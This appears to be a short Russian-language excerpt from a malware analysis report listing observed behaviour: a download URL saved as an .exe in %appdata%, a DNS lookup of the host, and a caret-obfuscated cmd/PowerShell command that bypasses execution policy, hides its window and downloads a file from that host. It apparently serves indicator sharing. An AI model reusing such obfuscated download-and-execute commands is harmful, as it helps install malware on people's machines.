Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pO^W^e^RsHELl.e^XE^ -^ExecuTIonpo^LicY BypaS^s -^noPRof^ile -wInDo^w^sTYL^e HI^DdEN ^(NEW-^ob^je^C^t Sy^s^T^em^.N^E^t^.WebcL^IE^Nt).^DOWn^LOAdfi^lE('http://mondayhelthc.top/read.php?f=...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "pO^W^e^RsHELl.e^XE^ -^ExecuTIonpo^LicY BypaS^s -^noPRof^ile -wInDo^w^sTYL^e HI^DdEN ^(NEW-^ob^je^C^t Sy^s^T^em^.N^E^t^.WebcL^IE^Nt).^DOWn^LOAdfi^lE('http://mondayhelthc.top/read.php?f=...' (со скрытым окном)